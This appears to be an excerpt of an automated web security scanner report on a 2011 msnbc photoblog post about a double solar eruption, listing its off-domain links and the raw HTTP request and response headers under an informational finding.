Date: Sat, 29 Jan 2011 23:50:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176986

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://photoblog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942494&amp;rand=1221780086&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fhp-notebook.us.msn.com%2F%3Fpc%3DHPNTDF&amp;ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://photoblog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</span>A spectacular double eruption on the sun was captured today by NASA's <a target="_blank" href="http://sdo.gsfc.nasa.gov/">Solar Dynamics Observatory</a>. The eruptions happened nearly simultaneously on opposite sides of the solar disk, <a target="_blank" href="http://spaceweather.com/">SpaceWeather.com reported</a>
...[SNIP]...
<p><a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_pictures" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" data-Text="Double whammy on the sun">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DS-Houston.newsvine.com/">DS in Houston</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Ghost2516914.newsvine.com/">Ghost-2516914</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Eric2189088.newsvine.com/">Eric-2189088</a>
...[SNIP]...
<div class="normal"><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://OscarPWalnuts.newsvine.com/">Oscar P Walnuts</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://whyajones.newsvine.com/">Cappy-1911</a>
...[SNIP]...
<div class="normal"><a href="http://jayphly1300264.newsvine.com/">jayphly-1300264</a>
...[SNIP]...
<div class="normal"><a href="http://patrick111.newsvine.com/">Patrick-1112710</a>
...[SNIP]...
<div class="normal"><a href="http://aanhonestsortnhonestsort-1436725.newsvine.com/">anhonestsort-1436725</a>
...[SNIP]...
<div class="normal"><a href="http://PhantomBeast.newsvine.com/">PhantomBeast</a>
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Roy-1813861.newsvine.com/">Roy-1813861</a>
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Nerakluvs.newsvine.com/">Nerakluvs</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://Cabernet2go.newsvine.com/">Ken Johnson-306874</a>
...[SNIP]...
<div class="normal"><a href="http://Sonflower.newsvine.com/">Sonflower</a>
...[SNIP]...
<div class="normal"><a href="http://wvbuild.newsvine.com/">wvbuild</a>
...[SNIP]...
<div class="normal"><a href="http://mdb123.newsvine.com/">MDB123</a>
...[SNIP]...
<div class="normal"><a href="http://Pandori.newsvine.com/">Pandori</a>
...[SNIP]...
<div class="normal"><a href="http://Attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="normal"><a href="http://IWonder2997692.newsvine.com/">I Wonder-2997692</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://spiddas.newsvine.com/">Spiddas</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://tracer58.newsvine.com/">tracer58</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://DumbJock.newsvine.com/">Dumb Jock</a>
...[SNIP]...
<div class="normal"><a href="http://hal90004.newsvine.com/">~HAL9000~</a>
...[SNIP]...
<div class="normal"><a href="http://TAMUK.newsvine.com/">TAMUK</a>
...[SNIP]...
<div class="normal"><a href="http://larbell.newsvine.com/">larbell</a>
...[SNIP]...
<div class="normal"><a href="http://paulhardy.newsvine.com/">orbust</a>
...[SNIP]...
<div class="normal"><a href="http://2srvHM.newsvine.com/">2srvHM</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://UnregisteredUser.newsvine.com/">Unregistered User</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://polanofp.newsvine.com/">An American!</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://phillyc1.newsvine.com/">PhillyC</a>
...[SNIP]...
<div class="normal"><a href="http://elven-bookworm.newsvine.com/">Elven Bookworm</a>
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MC2075922.newsvine.com/">MC-2075922</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Phoehammer.newsvine.com/">Phoehammer</a>
...[SNIP]...
<div class="normal"><a href="http://BillyBill.newsvine.com/">BillyBill</a>
...[SNIP]...
<div class="normal"><a href="http://scott-mckinsey.newsvine.com/">Mbones</a>
...[SNIP]...
<div class="normal"><a href="http://edwardduffy.newsvine.com/">Edward Duffy</a>
...[SNIP]...
<div class="normal"><a href="http://DaveO2998087.newsvine.com/">Dave-O-2998087</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://robw1001.newsvine.com/">Robert Fleming</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpfs52.newsvine.com/">jpfs52</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://senigallia.newsvine.com/">senigallia</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jwp6868.newsvine.com/">Joe in NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://mnstrm2.newsvine.com/">Art-981203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ffeineandsugar.newsvine.com/">ffeineandsugar</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://sbphrog.newsvine.com/">SBPhrog</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://chibnikh.newsvine.com/">Herman C</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://steveorevo.newsvine.com/">S-480203</a>
...[SNIP]...
<div class="normal"><a href="http://Isthishumanity.newsvine.com/">Is this humanity</a>
...[SNIP]...
<div class="normal"><a href="http://snrekkcaj.newsvine.com/">Dissociate</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://rwh0829.newsvine.com/">riscifiguy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeObama2313287.newsvine.com/">Mike Obama-2313287</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://votelover.newsvine.com/">votelover</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Brilli99.newsvine.com/">Brilli-99</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://glenbo02.newsvine.com/">glenbo</a>
...[SNIP]...
<div class="normal"><a href="http://josh1791701.newsvine.com/">Josh-1791701</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://RevitRay.newsvine.com/">Revit Ray</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mpp2029706.newsvine.com/">mpp-2029706</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://catastrophe3.newsvine.com/">cat(astrophe)</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://markscastle.newsvine.com/">MC-784701</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaughterofDaedalus.newsvine.com/">Daughter of Daedalus</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.248. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

Summary

Severity:   Information
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=12
Date: Sun, 30 Jan 2011 16:57:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191855

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://photoblog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
